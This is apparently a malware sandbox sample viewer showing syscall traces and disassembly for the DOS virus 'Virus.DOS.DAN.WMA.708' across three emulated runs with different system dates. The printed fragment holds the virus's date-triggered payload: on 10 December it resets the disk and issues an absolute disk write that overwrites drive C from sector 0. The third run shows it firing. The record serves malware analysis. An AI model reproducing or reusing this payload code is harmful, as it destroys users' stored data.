Sample viewer

vx.netlux.org/Virus.DOS.DAN.WMA.708

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:06:59.176710044Z 42 PC: 12a52 | Get date
0x12a52: cmp dx, 0xc0a
0x12a56: jne 0x12a66
0x12a58: mov ah, 0xd
0x12a5a: int 0x21
0x12a5c: xor dx, dx
0x12a5e: mov al, 2
0x12a60: mov cx, 0xfffe
0x12a63: int 0x26
0x12a65: pop ax
0x12a66: push ds
0x12a67: push es
0x12a68: dec byte ptr cs:[bp + 0x24]
0x12a6d: push 0xfaca
0x12a70: pop ax
0x12a71: int 0x21
0x12a73: cmp bx, 0xfaca
0x12a77: je 0x12a7f
0x12a79: call 0x12ab3
0x12a7c: call 0x12ae5
0x12a7f: pop es
2018-12-17T22:06:59.179805054Z 250 PC: 12a73 | UNKNOWN!
2018-12-17T22:06:59.188744413Z 74 PC: 12ac7 | Reallocate memory
2018-12-17T22:06:59.190103113Z 72 PC: 12ace | Allocate memory
2018-12-17T22:06:59.193183917Z 53 PC: 12aec | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:06:59.19483823Z 37 PC: 12afb | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:06:59.196415431Z 76 PC: 12d09 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1901,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:44:31.49184423Z 42 PC: 12a52 | Get date
0x12a52: cmp dx, 0xc0a
0x12a56: jne 0x12a66
0x12a58: mov ah, 0xd
0x12a5a: int 0x21
0x12a5c: xor dx, dx
0x12a5e: mov al, 2
0x12a60: mov cx, 0xfffe
0x12a63: int 0x26
0x12a65: pop ax
0x12a66: push ds
0x12a67: push es
0x12a68: dec byte ptr cs:[bp + 0x24]
0x12a6d: push 0xfaca
0x12a70: pop ax
0x12a71: int 0x21
0x12a73: cmp bx, 0xfaca
0x12a77: je 0x12a7f
0x12a79: call 0x12ab3
0x12a7c: call 0x12ae5
0x12a7f: pop es
2018-12-25T11:44:31.494137156Z 250 PC: 12a73 | UNKNOWN!
2018-12-25T11:44:31.495086848Z 74 PC: 12ac7 | Reallocate memory
2018-12-25T11:44:31.49637785Z 72 PC: 12ace | Allocate memory
2018-12-25T11:44:31.498459382Z 53 PC: 12aec | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:44:31.502906618Z 37 PC: 12afb | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:44:31.505551824Z 76 PC: 12d09 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":10,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1901,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:44:31.527737584Z 42 PC: 12a52 | Get date
0x12a52: cmp dx, 0xc0a
0x12a56: jne 0x12a66
0x12a58: mov ah, 0xd
0x12a5a: int 0x21
0x12a5c: xor dx, dx
0x12a5e: mov al, 2
0x12a60: mov cx, 0xfffe
0x12a63: int 0x26
0x12a65: pop ax
0x12a66: push ds
0x12a67: push es
0x12a68: dec byte ptr cs:[bp + 0x24]
0x12a6d: push 0xfaca
0x12a70: pop ax
0x12a71: int 0x21
0x12a73: cmp bx, 0xfaca
0x12a77: je 0x12a7f
0x12a79: call 0x12ab3
0x12a7c: call 0x12ae5
0x12a7f: pop es
2018-12-25T11:44:31.530527763Z 13 PC: 12a5c | Disk reset
2018-12-25T11:44:31.533968488Z 250 PC: 12a73 | UNKNOWN!
2018-12-25T11:44:31.535261337Z 74 PC: 12ac7 | Reallocate memory
2018-12-25T11:44:31.537893445Z 72 PC: 12ace | Allocate memory
2018-12-25T11:44:31.547678482Z 53 PC: 12aec | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:44:31.549564999Z 37 PC: 12afb | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:44:31.551733921Z 76 PC: 12d09 | Terminate with return code (Return code = '0')